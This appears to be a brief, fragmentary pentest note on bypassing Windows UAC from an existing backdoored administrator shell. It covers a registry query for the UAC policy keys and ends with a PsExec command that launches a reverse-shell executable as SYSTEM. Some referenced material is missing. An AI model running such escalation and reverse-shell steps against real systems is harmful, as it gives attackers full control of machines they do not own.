Bypassing Default UAC settigs manually

No exploitation needed because the machine already has a backdoor. The shell belongs to the local Administrators group but UAC is enabled and needs to be bypassed, before we can elevate to SYSTEM. Specifically what must done are these steps, and in order.

  1. Elevate cmd shell from Medium to High integrity

  2. Elevate from High integrity cmd shell to SYSTEM

How to confirm it

>reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System

Now notice the three highlighted keys above and their values.

  1. EnableLUA tells us whether UAC is enabled. If 0 we don’t need to bypass it at all can just PsExec to SYSTEM. If it’s 1 however, then check the other 2 keys

  2. ConsentPromptBehaviorAdmin can theoretically take on 6 possible values (readable explanation here), but from configuring the UAC slider in Windows settings it takes on either 0, 2 or 5.

  3. PromptOnSecureDesktop is binary, either 0 or 1.

PsExec64.exe -i -accepteula -d -s C:\Users\alice\Desktop\reverse_3333.exe

Last updated